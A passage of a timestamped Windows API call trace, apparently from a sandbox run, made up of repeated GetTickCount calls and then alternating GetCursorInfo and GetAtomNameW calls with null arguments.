0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.969] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.970] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.971] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.972] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.973] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.974] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504c2 [0085.975] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0085.976] GetTickCount () returned 0x11504d2 [0086.470] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.470] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.470] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.470] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.470] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.470] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.470] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.470] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.471] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.471] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.472] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.472] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.473] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.473] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.474] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.474] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.475] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.475] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.476] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.476] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] 